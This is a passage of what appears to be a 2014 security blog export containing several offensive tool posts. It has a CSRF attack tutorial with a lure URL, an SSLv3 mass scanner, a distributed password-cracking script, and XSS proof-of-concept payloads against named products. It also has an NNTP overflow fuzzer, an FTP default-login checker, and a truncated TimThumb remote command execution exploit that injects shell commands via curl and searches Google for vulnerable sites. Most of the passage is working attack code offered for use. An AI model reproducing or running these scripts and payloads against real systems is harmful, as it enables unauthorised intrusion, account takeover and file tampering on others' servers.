Content-Type: application/x-www-form-urlencoded
<br />
Content-Length: 279
<br />
Host: www.vulnerabletocsrf.com<br />
<br />
modwhat=change_a&BillingID=&ShipID=&CCardID=&OrderPlaced=&ReturnTo=&Email=test123456%40mailinator.com&AddNewCustomer=&Emailagain=test123456%40mailinator.com&password=&passwordagain=&emailsubscriber=Y&btnContinue.x=35&btnContinue.y=16&NewSignup=&CustomerID=&Anonymous=&DirectLink=<br />
<br />
<br />
<b>Step 3:</b> Recreate the original POST form on your own web server. To do this, you will need to check all form field data and HTML being passed by the target website. You can do this by viewing the source code of the target website where the POST form is found. Be sure to update the POST action="" section of the form to the target URL ie. http://www.vulnerabletocsrf.com/AccountSettings.asp. You also need to update the values of each form field to the values you want to change (ie. email address, password, CC number, etc..).<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7cuRtn25PbVNlOuwZu4J2gGcHknABaZXO8nHzmA17bCpz_i6d0CA68YwQdpT6hG3I0TlbTjY8ALrDPN-A15_FWSjQp_2vUrpWP-mha8M9uOzYR-8weLQelYzPejdaMpvLdjIgmli5tbdg/s1600/csrf2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7cuRtn25PbVNlOuwZu4J2gGcHknABaZXO8nHzmA17bCpz_i6d0CA68YwQdpT6hG3I0TlbTjY8ALrDPN-A15_FWSjQp_2vUrpWP-mha8M9uOzYR-8weLQelYzPejdaMpvLdjIgmli5tbdg/s1600/csrf2.png" /></a><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>NOTE:</b> You can also include Javascript to automatically submit the form as soon as a user views the page via document.forms["f1"].submit(); as seen above.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>STEP 4:</b> Now that we have our new CSRF form sitting on our web server, we can send this page to users of the site to entice them to click on our link (ie. http://evilattacker.com/test.html). If the site is vulnerable to CSRF, the form fields that we edited will be automatically submitted on the user's behalf and updated. It should also be noted that this can all be done via a hidden <iframe> in any website the user visits as well.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: red;"><b>DISCLAIMER:</b></span> This is merely for educational purposes to teach more about the dangers of CSRF and improve security.</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-89945550276509909672014-10-17T04:52:00.000-07:002014-10-17T05:10:41.314-07:00PoodleWalk SSLv3 Scanner#!/bin/bash<br /># PoodleWalk SSLv3 Scanner v20141017 by 1N3<br /># http://treadstonesecurity.blogspot.ca<br /># Usage: ./poodlewalk.sh <CIDR|IP><br />#<br /># ABOUT:<br /># PoodWalk makes it easier to mass scan environments for systems vulnerable to the "Poodle" vulnerability. It uses unicorn scan to scan a large range of IP's or CIDR blocks for port 443. If open, poodwalk runs SSLScan for SSLv3 enabled ciphers which are vulnerable to the "Poodle" attack in CVE-2014-3566.<br />#<br /># REQUIREMENTS:<br /># Is unicornscan installed?<br /># Is sslscan installed?<br />#<br /># USAGE EXAMPLES:<br /># ./poodlewalk.sh 192.168.0.0/16 - Mass scan all hosts for port 443 and test for SSLv3 on 192.168.0.0/16<br /># for a in `cat my_list_of_domains_or_ips.txt`; do ./poodlewalk.sh $a; done; - Mass scan a text file of domains and IP's for Poodle<br />#<br /><br />echo -e "\033[1m(--==== PoodleWalk SSLv3 Scanner by 1N3"<br />echo -e "\033[1m(--==== http://treadstonesecurity.blogspot.ca"<br />tput sgr0<br />echo ""<br /><br />UNICORNSCAN=`which unicornscan`<br />SSLSCAN=`which sslscan`<br />RANGE=$1<br /><br />if [ "$UNICORNSCAN" == "" ]; then<br /> echo -e "\033[1m(--==== Unicornscan not installed! Exiting..."<br /> exit<br />fi<br /><br />if [ "$SSLSCAN" == "" ]; then<br /> echo -e "\033[1m(--==== SSLScan not installed! Exiting..."<br /> exit<br />fi<br /><br />if [ -z "$1" ]; then<br /> echo -e "\033[1m(--==== Usage: $0 <CIDR|IP>"<br /> exit<br />fi<br /><br />echo -e "\033[1m(--==== Testing for Poodle (SSLv3): $RANGE"<br />for a in `unicornscan $RANGE -p 443 | awk '{print $6}'`; <br />do <br /> echo -e "\033[1m(--==== Testing for Poodle (SSLv3): $a"<br /> sslscan --no-failed $a | egrep --color=auto 'Accepted SSLv3'<br />done<br /><br />echo -e "\033[1m(--==== Scan Complete!"<br />exit Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-23299680489639662522014-08-22T13:31:00.000-07:002014-10-17T04:56:59.624-07:00GridCrack - A Grid Based Password Cracker#!/bin/bash<br />
# GRIDCRACK v20140822 by 1N3 @ http://xerosecurity.com<br />
# <br />
# USAGE: ./gridcrack <crack/status/setup> <format><br />
#<br />
# ABOUT:<br />
# GRIDCRACK is a Linux grid based password cracker used to leverage multiple servers to crack a single hash file. <br />
#<br />
# REQUIREMENTS:<br />
# 1) Two or more Linux based servers running John The Ripper (john)<br />
# 2) root SSH keys setup for automatic login/authentication via SSH keys<br />
# 3) A large masterlist dictionary file to split amongst the configured nodes<br />
#<br />
# HOW IT WORKS:<br />
# Running ./gridcrack setup will launch the initial setup of gridcrack which will prompt for the masterlist.dic file (a large wordlist of your choice..). <br />
# From there, it will proceed to split the file into equal parts based on the number of configured nodes in this script (NUM_NODES). Next, It will transfer<br />
# the individual parts of the split wordlist to each host via SCP. From here, the user can copy/paste their hashes into the hashes.txt (/pentest/gridcrack/hashes.txt)<br />
# and run the appropriate command to begin the brute force attack (ie. ./gridcrack crack NT). From here, gridcrack will first copy the hashes.txt to each node first,<br />
# then proceed to run john on each node simultaneously using the format specified (ie. NT). Results are then displayed back to the central server as <br />
# each node finishes. A status mode is also included to show the status of john on each node (ie. ./gridcrack status NT). <br />
#<br />
#<br />
<br />
# STATIC VARS<br />
# FILL THIS OUT PRIOR TO RUNNING GRIDCRACK...<br />
NUM_NODES=""<br />
NODE1=""<br />
NODE2=""<br />
NODE3=""<br />
GRIDCRACK_HOME=""<br />
<br />
# CRACK MODE<br />
if [ "$1" == "crack" ]<br />
then<br />
if [ -z "$2" ]<br />
then<br />
echo "Format not set. Use ./gridcrack crack <format> to set it..."<br />
exit 1<br />
else<br />
FORMAT="$2"<br />
# TRANSFER HASHES TO EACH NODE<br />
echo "Transferring hashes to each node..."<br />
if [ "$NODE1" ]<br />
then<br />
scp $GRIDCRACK_HOME/hashes.txt root@$NODE1:$GRIDCRACK_HOME 2> /dev/null<br />
fi<br />
<br />
if [ "$NODE2" ]<br />
then<br />
scp $GRIDCRACK_HOME/hashes.txt root@$NODE2:$GRIDCRACK_HOME 2> /dev/null<br />
fi<br />
<br />
if [ "$NODE3" ]<br />
then<br />
scp $GRIDCRACK_HOME/hashes.txt root@$NODE3:$GRIDCRACK_HOME 2> /dev/null<br />
fi<br />
<br />
# START CRACKING ON EACH NODE<br />
echo "Starting crack mode on each node..."<br />
if [ "$NODE1" ]<br />
then<br />
ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xaa -format=$FORMAT 2> /dev/null && ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt -format=$FORMAT --show &<br />
fi<br />
<br />
if [ "$NODE2" ]<br />
then<br />
ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xab --format=$FORMAT 2> /dev/null && ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show & <br />
fi<br />
<br />
if [ "$NODE3" ]<br />
then<br />
ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xac --format=$FORMAT 2> /dev/null && ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show & <br />
fi<br />
fi<br />
<br />
# SHOW STATUS<br />
elif [ "$1" == "status" ]<br />
then<br />
if [ -z "$2" ]<br />
then<br />
echo "Format not set. Use ./gridcrack status <format> to set it..."<br />
exit 1<br />
else<br />
FORMAT="$2"<br />
echo "Checking status..."<br />
if [ "$NODE1" ]<br />
then<br />
echo "#### NODE1:"<br />
ssh root@$NODE1 ps -ef | grep john | grep hashes<br />
ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt -format=$FORMAT --show <br />
fi<br />
<br />
if [ "$NODE2" ]<br />
then<br />
echo "#### NODE2:"<br />
ssh root@$NODE2 ps -ef | grep john | grep hashes<br />
ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show <br />
fi<br />
if [ "$NODE3" ]<br />
then<br />
echo "#### NODE3:"<br />
ssh root@$NODE3 ps -ef | grep john | grep hashes<br />
ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show<br />
fi<br />
fi<br />
<br />
# RUN SETUP<br />
elif [ "$1" == "setup" ]<br />
then<br />
echo "################"<br />
echo "Running setup..."<br />
echo "################"<br />
echo ""<br />
echo "Enter full name and path to masterlist.dic...(ie. /pentest/gridcrack/wordlists/masterlist.dic)"<br />
read MASTERLIST<br />
MASTERLIST_LINES=`wc -l $MASTERLIST | awk '{print $1}'`<br />
MASTERLIST_LINES=`expr $MASTERLIST_LINES / $NUM_NODES`<br />
cd $GRIDCRACK_HOME/wordlists/<br />
echo "Splitting wordlists... this could take a few minutes..."<br />
split -l $MASTERLIST_LINES $MASTERLIST<br />
ls -lh $GRIDCRACK_HOME/wordlists/<br />
if [ "$NODE1" ]<br />
then<br />
echo "Creating directory structure on $NODE1..."<br />
ssh root@$NODE1 mkdir $GRIDCRACK_HOME/wordlists/ -p<br />
scp $GRIDCRACK_HOME/wordlists/xaa root@$NODE1:$GRIDCRACK_HOME/wordlists/ 2> /dev/null<br />
fi<br />
<br />
if [ "$NODE2" ]<br />
then<br />
ssh root@$NODE2 mkdir $GRIDCRACK_HOME/wordlists/ -p<br />
scp $GRIDCRACK_HOME/wordlists/xab root@$NODE2:$GRIDCRACK_HOME/wordlists/ 2> /dev/null<br />
fi<br />
if [ "$NODE3" ]<br />
then<br />
ssh root@$NODE3 mkdir $GRIDCRACK_HOME/wordlists/ -p<br />
scp $GRIDCRACK_HOME/wordlists/xac root@$NODE3:$GRIDCRACK_HOME/wordlists/ 2> /dev/null<br />
fi<br />
<br />
# SHOW HELP SCREEN<br />
elif [ "$1" == "-h" ]<br />
then<br />
echo "************* GRIDCRACK by 1N3 ********************"<br />
echo "Usage: ./gridcrack.sh <crack/status/setup> <format>"<br />
echo "************* http://xerosecurity.com *************"<br />
else<br />
echo "************* GRIDCRACK by 1N3 ********************"<br />
echo "Usage: ./gridcrack.sh <crack/status/setup> <format>"<br />
echo "************* http://xerosecurity.com *************"<br />
fi<br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-2092660445684603822014-08-13T09:03:00.001-07:002014-08-13T09:09:26.266-07:00All In One SEO Pack v.2.2.2 Stored XSS<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1dPbL9CAXPcHbJrEXCaUS34bpO3sYGwep2-68fnU4L9JtqFr4H29j1Iytr4V22a0M401duNJ-Kou5gspJedzxOPx3mGSg_8T94wYiGYU2n1ZNEwbs-2cbZ9vpsS93do7mna289Cc6aHrh/s1600/wordpress_XSS2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1dPbL9CAXPcHbJrEXCaUS34bpO3sYGwep2-68fnU4L9JtqFr4H29j1Iytr4V22a0M401duNJ-Kou5gspJedzxOPx3mGSg_8T94wYiGYU2n1ZNEwbs-2cbZ9vpsS93do7mna289Cc6aHrh/s1600/wordpress_XSS2.png" height="90" width="400" /></a></div>
<br />
<br />
Author: 1N3<br />
Website: http://xerosecurity.com<br />
Vender Website: https://wordpress.org/plugins/all-in-one-seo-pack/<br />
Affected Product: All In One SEO Pack<br />
Affected Version: 2.2.2<br />
<br />
<b>ABOUT:</b><br />
<br />
All in One SEO Pack is a WordPress SEO plugin to automatically
optimize your WordPress blog for Search Engines such as Google. Version 2.2.2 suffers from
a cross site scripting (XSS) vulnerability in the “/wp-admin/post.php”
page because it fails to properly sanitize the “aiosp_menulabel” form field.<span id="more-94"></span> A malicious author or admin of a site could use this flaw to secretly redirect users of a site to a malicious site or steal session cookies of other users.<br />
<br />
<br />
NOTE: User must have the ability to publish pages in the affected Wordpress site (usually Author or Admin roles required). <br />
<br />
<b>POC:</b><br />
http://localhost/wordpress/wp-admin/post.php?post_type=page<br />
<br />
Host=localhost<br />
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0<br />
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language=en-US,en;q=0.5<br />
Accept-Encoding=gzip, deflate<br />
Referer=http://localhost/wordpress/wp-admin/post-new.php?post_type=page<br />
Cookie=wp-saving-post-107=check; wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1408112201%7C5eb50362019f43eae995f2e48c5227f4; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1407939753; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1408112201%7C0a5ac5bc9c15db1b47d703678928b5be; PHPSESSID=oibbnvob8bp761ep58hlijji23; bp-activity-oldestpage=1<br />
Content-Type=application/x-www-form-urlencoded<br />
Content-Length=1856<br />
<br />
POSTDATA=_wpnonce=6da01af260&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dpage&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=page&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D105%26action%3Dedit%26message%3D6&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D105%26action%3Dedit%26message%3D6&auto_draft=&post_ID=107&meta-box-order-nonce=a33dd2a867&closedpostboxesnonce=e5ec4ba0bf&post_title=XSS2&samplepermalinknonce=12c1ea009d&content=XSS2&mobile_template_box_nonce=704c3cc317&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dpage&wptouch_mobile_page_template=Default+Template&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=08&jj=13&aa=2014&hh=10&mn=29&ss=11&hidden_mm=08&cur_mm=08&hidden_jj=13&cur_jj=13&hidden_aa=2014&cur_aa=2014&hidden_hh=10&cur_hh=10&hidden_mn=29&cur_mn=29&original_publish=Publish&publish=Publish&parent_id=&page_template=default&menu_order=0&yoast_wpseo_focuskw=&yoast_wpseo_title=&yoast_wpseo_metadesc=&yoast_wpseo_meta-robots-noindex=0&yoast_wpseo_sitemap-include=-&yoast_wpseo_sitemap-prio=-&yoast_wpseo_sitemap-html-include=-&yoast_wpseo_authorship=-&yoast_wpseo_canonical=&yoast_wpseo_redirect=&yoast_wpseo_opengraph-description=&yoast_wpseo_opengraph-image=&yoast_wpseo_google-plus-description=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=85af917bd6&advanced_view=1&comment_status=open&ping_status=open&post_name=&post_author_override=1&aiosp_edit=aiosp_edit&nonce-aioseop-edit=d33cea6040&aiosp_title=&length1=0&aiosp_description=&length2=0&aiosp_keywords=&aiosp_titleatr=&aiosp_menulabel=%3Cscript%3Ealert%288%29%3B%3C%2Fscript%3EUnknownnoreply@blogger.com1tag:blogger.com,1999:blog-3352537640011430393.post-48571467723210961032014-08-12T12:58:00.000-07:002014-08-12T12:58:11.572-07:00Network News Transfer Protocol (NNTP) Fuzzer<div class="entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7G5lgenGMtJDeQkkOhMdi8lMPXrE2y0OqmkbkstPN41SlVHjDaDDakY7Eg0aNM5kFhNyqP4TByoJXG1aD8mhIh3wXeC4r9vDRZ7uYi41eK1DvEBb4oGB5GrXX9Iuj6-QTd-lAqZ38xfEt/s1600/index.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7G5lgenGMtJDeQkkOhMdi8lMPXrE2y0OqmkbkstPN41SlVHjDaDDakY7Eg0aNM5kFhNyqP4TByoJXG1aD8mhIh3wXeC4r9vDRZ7uYi41eK1DvEBb4oGB5GrXX9Iuj6-QTd-lAqZ38xfEt/s1600/index.jpeg" height="156" width="320" /></a></div>
<br />
#!/usr/bin/python<br />
# Network News Transport Protocol Fuzzer by 1N3 v20140802<br />
# http://xerosecurity.com<br />
#<br />
# USAGE: NTTP_fuzz.py <IP/host> <port><br />
#<span id="more-100"></span><br />
#HELP<br />
#100 Supported Commands<br />
# MODE READER<br />
# AUTHINFO USER <username><br />
# AUTHINFO PASS <password><br />
# LIST <active|newsgroups|overview.fmt> <pattern><br />
# XGTITLE <pattern><br />
# GROUP <newsgroup><br />
# LISTGROUP <newsgroup><br />
# NEWGROUPS <yy><yymmdd> <hhmmss><br />
# OVER <range|msgid><br />
# XOVER <range|msgid><br />
# XHDR <header> <range|msgid><br />
# XPAT <header> <range|msgid> <pattern> <pattern..><br />
# NEWNEWS <newsgroup> <yymmdd> <hhmmss> <gmt|utc><br />
# STAT <msgid|number><br />
# HEAD <msgid|number><br />
# BODY <msgid|number><br />
# ARTICLE <msgid|number><br />
# POST<br />
# NEXT<br />
# LAST<br />
# HELP<br />
# DATE<br />
# QUIT<br />
import socket<br />
import time<br />
import sys, getopt<br />
def main(argv):<br />
argc = len(argv)<br />
if argc <= 1:<br />
print “usage: %s <host>” % (argv[0])<br />
sys.exit(0)<br />
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # CREATE SOCKET<br />
buffer = ["X"] # BUFFER “X”<br />
counter = 100 # START VALUE<br />
target = argv[1] # SET TARGET<br />
port = “119″ # SET PORT<br />
while (len(buffer)) <= 10000: # END VALUE<br />
buffer=”X”*counter<br />
counter=counter+100 # MULTIPLIER<br />
print “(–==== Fuzzing ” + target + “:” + port + ” with length:” +str(len(buffer))<br />
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
connect=s.connect((target,int(port)))<br />
data = s.recv(1024)<br />
#print “CONNECTION: ” +data<br />
s.send(‘AUTHINFO USER ‘ + buffer + ‘\r\n’)<br />
data = s.recv(1024)<br />
#print “received: ” +data<br />
s.send(‘AUTHINFO PASS ‘ + buffer + ‘\r\n’)<br />
data = s.recv(1024)<br />
print “received: ” +data<br />
s.close()<br />
#time.sleep(3)<br />
# print “\n”.join(sys.argv)<br />
main(sys.argv)<br />
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-89822255399463512312014-08-12T12:55:00.002-07:002014-08-12T12:55:57.261-07:00Anonymous FTP Login Checker<div class="entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwyEq1mFr6mD2_57R0HyEdwE5ANhh1N3an80fjFf40Wuwz-wcRnaH_T_dvgmlAVDILFB1VQ_tl2Q0K8agZSXjLNRAy23G7w80aGuOSiS5oT50hmalpqvRbZusKAvpiKHtcSn_Aq1sXh4_3/s1600/ftp-click.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwyEq1mFr6mD2_57R0HyEdwE5ANhh1N3an80fjFf40Wuwz-wcRnaH_T_dvgmlAVDILFB1VQ_tl2Q0K8agZSXjLNRAy23G7w80aGuOSiS5oT50hmalpqvRbZusKAvpiKHtcSn_Aq1sXh4_3/s1600/ftp-click.jpg" height="214" width="320" /></a></div>
<br />
#!/usr/bin/python<br />
# Anonymous FTP login checker by 1N3 v20140805<br />
# http://xerosecurity.com<br />
#<br />
# ABOUT:<br />
# This script checks the remote host for anonymous FTP accounts enabled.<br />
<span id="more-98"></span><br />
import socket<br />
import time<br />
import sys, getopt<br />
def main(argv):<br />
argc = len(argv)<br />
if argc <= 1:<br />
print “usage: %s <host>” % (argv[0])<br />
sys.exit(0)<br />
print “(–==== Checking anonymous FTP login…\n”<br />
users=["anonymous","admin","ftp","administrator","guest"]<br />
target = argv[1] # SET TARGET<br />
for user in users:<br />
print “(–==== Checking user: ” +user<br />
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
s.connect((target,21))<br />
data = s.recv(1024)<br />
s.send(‘USER ‘ +user+ ‘\r\n’)<br />
data = s.recv(1024)<br />
s.send(‘PASS ‘ +user+ ‘\r\n’)<br />
data = s.recv(1024)<br />
print data<br />
s.send(‘QUIT’ +’\r\n’)<br />
s.close()<br />
main(sys.argv)<br />
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-355178038942447352014-07-31T04:12:00.000-07:002014-07-31T04:12:34.761-07:00Lyris ListManagerWeb 8.95a Reflective XSS<div class="entry-content">
Author: 1N3<br />
Website: http://xerosecurity.com<br />
Vender Website: http://lyris.com/us-en/products/listmanager<br />
Affected Product: Lyris ListManagerWeb<br />
Affected Version: 8.95a<br />
<br />
<b>ABOUT:</b><br />
Lyris ListManager (Lyris LM)<strong> </strong> is an on-premises email
marketing software for companies that require the ability to deploy
high-volume email programs behind a firewall. Version 8.95a suffers from
a cross site scripting (XSS) vulnerability in the “doemailpassword.tml”
page because it fails to properly sanitize the “EmailAddr” POST
variable.<span id="more-94"></span><br />
<br />
<b>POC:</b><br />
POST http://host.com/doemailpassword.tml HTTP/1.1<br />
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language: en-US,en;q=0.5<br />
Referer: http://host.com/emailpassword.tml<br />
Connection: keep-alive<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 71<br />
Proxy-Connection: Keep-Alive<br />
Host: host.com<br />
<br />
EmailAddr=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E<br />
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-80798604457702471002014-07-21T10:32:00.002-07:002014-07-21T10:41:05.536-07:00MyConnection Server (MCS) Reflective XSS<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiIe37Xf49ql2cIscqtceDbQq9IGUuU7P_VuYdQ-w6D8gHzMvGh9798xed0MQLGxomJLf6I411EbUqyedb9RErYcXCm8rXHxEMd_0m6F5Zrluym3f_bXIukTm1cI0an8WNr57DuYsCbtIQ/s1600/visualware_XSS1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiIe37Xf49ql2cIscqtceDbQq9IGUuU7P_VuYdQ-w6D8gHzMvGh9798xed0MQLGxomJLf6I411EbUqyedb9RErYcXCm8rXHxEMd_0m6F5Zrluym3f_bXIukTm1cI0an8WNr57DuYsCbtIQ/s1600/visualware_XSS1.png" height="140" width="400" /></a></div>
<br />
<br />
Author: 1N3<br />
Website: http://treadstonesecurity.blogspot.ca<br />
Vender Website: http://www.visualware.com/<br />
Affected Product: MyConnection Server <br />
Affected Version: 9.7i (others may also be vulnerable)<br />
<br />
ABOUT:<br />
MyConnection Server (MCS) delivers a broad range of support managed automated and user initiated self-help connection testing and monitoring services directly via the browser to any online customer/location anywhere in the world. Due to a failure to sanitize certain GET variables passed to the connection test page (usually test.php), it is possible to inject client side javascript to run in the context of the user browsing the website. Several parameters including testtype, ver, cm, map, lines, duration and others appear to be vulnerable. <br />
<br />
<br />
POC:<br />
http://scrubbedhost.com/test.php?testtype=1"><script>alert(1);</script>&codebase=myspeed.pathcom.com&location=Canada:%20Toronto,%20ON&ver=1"><script>alert(1);</script>&cm=1"><script>alert(1);</script>&map=1"><script>alert(1);</script>&lines=1"><script>alert(1);</script>&pps=1"><script>alert(1);</script>&bpp=1"><script>alert(1);</script>&codec=1"><script>alert(1);</script>&provtext=1"><script>alert(1);</script>&provtextextra=11"><script>alert(1);</script>&provlink=1"><script>alert(1);</script><br />
<br />
<br />
VULNERABLE CODE:<br />
<br />
* Both voiplines and testlength are written to the end user without being properly sanitized and thus vulnerable to reflective XSS. <br />
<br />
<td valign="top" width="30%"><b>Current<br />
Settings</b><br />
<br><br />
<br><br />
<b>VoIP Lines Simulated</b>:<br />
<script type="text/javascript"> document.write(voiplines); </script><br><br />
<b>Test Length</b>:<br />
<script type="text/javascript"> document.write(testlength); </script><br><br />
<b>Codec</b>:<br />
<script type="text/javascript"> if (codec == "g711") { document.write(nameg711); }<br />
else { document.write(nameg729); }<br />
</script><br><br />
</td><br />
<td align="left" width="70%"><br />
<p align="center"><br />
<script><br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-46863054024166693952014-06-27T05:06:00.000-07:002014-06-27T06:22:17.561-07:00TimThumb WebShot Code Execution Exploit (0-day)<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMOqITyTSTSukHr4MHlXGa711Ph0lnERi2ImrP5dJmq42OsxuWXVdn1N1Km-HtSD4-Hnf2Yn15jXr6xfiPtCC5OV-3WjQ2vzxxx6BLGr8KtGqyTV7TlxNeSLZVmzInkwds-1cedto8m3rN/s1600/wordpress-shortcode.jpg" imageanchor="1" imqq134697747865297241839497637511="true" style="margin-left: 1em; margin-right: 1em;" zmwifs738411679060974503591734517818="true"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMOqITyTSTSukHr4MHlXGa711Ph0lnERi2ImrP5dJmq42OsxuWXVdn1N1Km-HtSD4-Hnf2Yn15jXr6xfiPtCC5OV-3WjQ2vzxxx6BLGr8KtGqyTV7TlxNeSLZVmzInkwds-1cedto8m3rN/s1600/wordpress-shortcode.jpg" height="223" width="400" /></a></div>
<br />
<br />
#!/bin/bash<br /># Wordpress TimThumb Remote Command Execution Exploit (0day) v20140627 by 1N3<br /># (c) http://treadstonesecurity.blogspot.ca<br /># Usage: sh timthumb_0day.sh <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]<br />#<br /># ABOUT:<br /># TimThumb’s “Webshot” feature that allows for certain commands to be executed on the <br /># vulnerable website remotely (no authentication required). With a simple command, an <br /># attacker can create, remove and modify any files on your server. Timthumb 2.8.11-2.8.13<br /># with the WEBSHOT_ENABLED option enabled appear to be vulnerable. <br />#<br /># USAGE: <br /># ./timthumb_0day.sh <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]<br />#<br /># NOTE: proxy and command fields are optional. <br />#<br /># EXAMPLE:<br /># ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php<br /># ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php none rm$IFS/tmp/a.txt<br /># ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php proxy 'rm$IFS/tmp/a.txt'<br /><br /># BANNER<br />clear<br />echo "(--==== http://treadstonesecurity.blogspot.ca"<br />echo "(--==== Wordpress TimThumb Remote Command Execution Exploit (0day) by 1N3"<br />echo ""<br /><br /># VARS<br />UNICORNSCAN=`which unicornscan`<br />CURL=`which curl`<br />PROXYCHAINS=`which proxychains`<br />TARGET=$1<br />BASE_PATH=$2<br />PROXY=$3<br />COMMAND=$4<br /><br /># REQUIREMENTS<br />if [ "$PROXYCHAINS" == "" ]; then<br /> echo "(--==== Proxychains not installed! Continuing scan without proxy support..."<br /> exit<br />fi<br /><br />if [ "$CURL" == "" ]; then<br /> echo "(--==== Curl not installed! Exiting..."<br /> exit<br />fi<br /><br />if [ -z "$TARGET" ] || [ -z "$BASE_PATH" ]; then<br /> echo "(--==== Usage: $0 <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]"<br /> exit<br />fi<br /><br />if [ $TARGET == "google" ]; then<br /># USE GOOGLE HACKING TO FIND VULNERABLE SERVERS<br /> echo "Searching Google..."<br /> iceweasel 'https://www.google.com/search?q=TimThumb+version+%3A+2.8.13&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=iceweasel-a#q=inurl:%27%2Ftimthumb.php%27+filetype:php+inurl:plugins+inurl:wp-content&rls=org.mozilla:en-US:unofficial' &<br /> exit<br />fi<br /><br />if [ "$PROXY" = "proxy" ]; then<br />#PROXY ENABLED<br /> echo "(--==== Scanning via proxy..."<br /><br /> if [ -z $COMMAND ]; then<br /> # RUN DEFAULT COMMAND (ie. touch /tmp/a.txt)<br /> echo "(--==== Sending exploit request to: "$TARGET<br /> echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)'<br /> proxychains curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)' | grep version<br /> echo "(--==== Exploit 